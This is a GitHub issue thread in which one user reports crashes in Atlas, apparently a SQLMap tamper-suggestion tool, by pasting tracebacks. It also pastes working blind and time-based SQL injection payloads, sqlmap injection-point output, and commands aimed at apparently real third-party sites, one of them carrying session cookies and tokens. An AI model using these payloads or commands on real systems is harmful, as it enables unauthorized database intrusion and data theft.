### ISSUE TITLE
bug!? 

### ISSUE THREAD

**Issue by huitc** [m4ll0k/Atlas#7]
```
[12:21:12] [INFO] fetching current database
[12:21:12] [PAYLOAD] 1 AnD ORD(MID((IFnuLL(CAsT(DatABaSe() aS cHAR),0x20)),1,1))>64
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [PAYLOAD] 1 And ORD(MID((ifNUll(cAst(DATabAse() As chaR),0x20)),1,1))>32
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [PAYLOAD] 1 anD ORD(MID((IFNulL(cAsT(DatabaSe() As CHar),0x20)),1,1))>1
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [INFO] retrieved:
[12:21:12] [DEBUG] performed 3 queries in 0.14 seconds
[12:21:12] [PAYLOAD] 1 AnD 9517=iF((ORD(MID((iFNULL(CAsT(dATabaSE() aS CHar),0x20)),1,1))>64),SLEEP(5),9517)
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [PAYLOAD] 1 And 9517=If((ORD(MID((IfNULL(CAst(DataBAse() aS CHaR),0x20)),1,1))>32),SLEEP(5),9517)
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [PAYLOAD] 1 aNd 9517=iF((ORD(MID((iFNULL(CAst(dATabasE() aS cHAR),0x20)),1,1))>1),SLEEP(5),9517)
[12:21:12] [DEBUG] got HTTP error code: 403 (Forbidden)
[12:21:12] [INFO] retrieved:
[12:21:12] [DEBUG] performed 3 queries in 0.06 seconds
[12:21:12] [CRITICAL] unable to retrieve the database names
```
`python2 atlas.py -r -u "canttellyou.com/sor.php?AnnouncementID=1&ct=undefined" -p "1 And 9517=If((ORD(MID((IfNULL(CAst(DataBAse() aS CHaR),0x20)),1,1))>32),SLEEP(5),9517)" -c "ck_okok_okoklogin=1; PHPSESSID=dudm31qshvu2qm2w2w2w2w2w"`
```
[[1;35m19:46:39[0m] [[1;33mINFO[0m] [0;33mtrying with "randomcase" tamper...[0m
Traceback (most recent call last):
  File "atlas.py", line 265, in <module>
    atlas().main()
  File "atlas.py", line 221, in main
    payload__ = tamper(_payload)
  File "D:\atlas\tamper\general_randomcase.py", line 22, in general_randomcase
    m_word = word[random.randint(0,len(word))]
IndexError: string index out of range
```
`D:\atlas>`
```
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: AnnouncementID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: AnnouncementID=1 AND 2143=2143&ct=undefined
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: AnnouncementID=1 AND SLEEP(5)&ct=undefined
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
```
```
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
banner:    '5.0.95-log'
```

**Comment by huitc** [comment]
[INFO] checking if the payload is blocked by some kind of WAF/IDS/IPS..
Traceback (most recent call last):
  File "atlas.py", line 265, in <module>
    atlas().main()
  File "atlas.py", line 201, in main
    url,method,data,kwargs
  File "atlas.py", line 49, in run
    for param in testable.run():
  File "/data/data/com.termux/files/home/atlas/lib/params.py", line 29, in run
    elif '=' not in self.url and '=' in self.data:self.post()
TypeError: argument of type 'NoneType' is not iterable
$

**Comment by huitc** [comment]
`python2 atlas.py -v -r -m GET -u "http://xxxxxx.com/view.aspx?a_asd=4550&q_rew=137" -p "4551)+aNd+6498+BetweeN+4719+aNd+4719--+BTHY"`
```
[[1;35m22:56:55[0m] [[1;33mINFO[0m] [0;33mtrying with "randomcase" tamper...[0m
Traceback (most recent call last):
  File "atlas.py", line 265, in <module>
    atlas().main()
  File "atlas.py", line 221, in main
    payload__ = tamper(_payload)
  File "E:\you cant see me\atlas\tamper\general_randomcase.py", line 22, in general_randomcase
    m_word = word[random.randint(0,len(word))]
IndexError: string index out of range

C:\atlas>
```

**Comment by huitc** [comment]
`python2 atlas.py -v -r -u "http://www.hfjejf1611.com/?keyword=%B6%E0%B5%C0&s=0" -p "%B6%E0%B5%C0) AND 7452=9376 AND (4213=4213" -m GET`
```
[22:14:31] [INFO] trying with "randomcase" tamper...
Traceback (most recent call last):
  File "atlas.py", line 265, in <module>
    atlas().main()
  File "atlas.py", line 221, in main
    payload__ = tamper(_payload)
  File "/data/data/com.termux/files/home/atlas/tamper/general_randomcase.py", line 22, in general_randomcase
    m_word = word[random.randint(0,len(word))]
IndexError: string index out of range
$
```

**Comment by huitc** [comment]
`$ python2 atlas.py -m POST -r -u "http://i.test.test.com/tip/ajax/preview?test_test_view_id=63658090326342317&token=eBkeLMp9IcKmppLR6P2LA0vKEnYAAAAA0wcAANDEv78yC_7CQrwj2VohYAraDVdz9E60ziLxyBIrmcOjfMAOURQ1_j6WhqEjtlb-uA&userid=295456054&address=%E9%80%B8%E6%9D%B1%E9%82%A8&f=android&version=70704&test_appversion=7.7.4&test_ctype=android&uuid=A940FEBF2187E7A9240D9211C2AB3D0D520EDB964E75CBCC37CC54CDAB464DD2&platform=4&test_latitude=22277893&poilist_mt_cityid=0&test_actual_longitude=113939618&test_visitid=3b311002-daae-49c9-9802-0cc267a43ac7&test_dversion=26_8.0.0&test_mac=02%3A00%3A00%3A00%3A00%3A00&test_logintoken=eBkeLMp9IcKmppLR6P2LA0vKEnYAAAAA0wcAANDEv78yC_7CQrwj2VohYAraDVdz9E60ziLxyBIrmcOjfMAOURQ1_j6WhqEjtlb-uA&push_token=dpshb3fa69ae981cca42cd5eb2fdb75f6e34atpu&app=4&poilist_test_cityid=810001&test_longitude=113939618&test_actual_latitude=22277893&test_did=863254037772885&test_dtype=test%20test&test_uuid=A940FEBF2187E7A9240D9211C2AB3D0D520EDB964E75CBCC37CC54CDAB464DD2&partner=4&seq_id=82&test_channel=1011&request_id=C7B55D2D-7171-4432-9C04-442777EADD65&utm_term=70704&utm_campaign=AtestBtest&ci=118&utm_medium=android&utm_source=1011&utm_content=863254037772885&lat=22.271864283740196&lng=113.93287682343644" -D "test_view_id=63658090326342317&trace_tag=undefined" -p "63658090326342317 oR 1=1"`
```
       _   _
      | | | |
  __ _| |_| | __ _ ___
 / _` | __| |/ _` / __|
| (_| | |_| | (_| \__ \ v.0.1
 \__,_|\__|_|\__,_|___/ by M4ll0k

 Quick SQLMap Tamper Suggester
-----------------------------------

[*] Starting at 20:14:46

[20:14:46] [INFO] testing connection to the target URL...
[20:14:46] [INFO] checking if the payload is blocked by some kind of WAF/IDS/IPS..
[20:14:46] [WARN] return HTTP error code "456", the target is protected by some kind of WAF/IDS/IPS..
[20:14:46] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
[20:14:46] [INFO] WAF/IPS/IDS not identified!!
Traceback (most recent call last):
  File "atlas.py", line 265, in <module>
    atlas().main()
  File "atlas.py", line 207, in main
    url,method,data,kwargs
  File "atlas.py", line 100, in check
    resp = self.send(url,self.method,data=data)
  File "C:\Users\HUI\Documents\huitc\atlas\lib\request.py", line 60, in send
    return Resp(resp)
  File "C:\Users\HUI\Documents\huitc\atlas\lib\request.py", line 71, in __init__
    self.content = resp.read()
  File "C:\Python27\lib\socket.py", line 355, in read
    data = self._sock.recv(rbufsize)
  File "C:\Python27\lib\httplib.py", line 573, in read
    return self._read_chunked(amt)
  File "C:\Python27\lib\httplib.py", line 627, in _read_chunked
    raise IncompleteRead(''.join(value))
httplib.IncompleteRead: IncompleteRead(6097 bytes read)
```

**Comment by huitc** [comment]
```
Traceback (most recent call last):
  File "atlas.py", line 265, in <module>
    atlas().main()
  File "atlas.py", line 226, in main
    Process(url,method,data,kwargs).run()
  File "atlas.py", line 61, in run
    resp = self.send(url=url,method='POST',data=param)
  File "C:\Users\HUI\Documents\huitc\atlas\lib\request.py", line 60, in send
    return Resp(resp)
  File "C:\Users\HUI\Documents\huitc\atlas\lib\request.py", line 71, in __init__
    self.content = resp.read()
  File "C:\Python27\lib\socket.py", line 355, in read
    data = self._sock.recv(rbufsize)
  File "C:\Python27\lib\httplib.py", line 573, in read
    return self._read_chunked(amt)
  File "C:\Python27\lib\httplib.py", line 627, in _read_chunked
    raise IncompleteRead(''.join(value))
httplib.IncompleteRead: IncompleteRead(6097 bytes read)
```
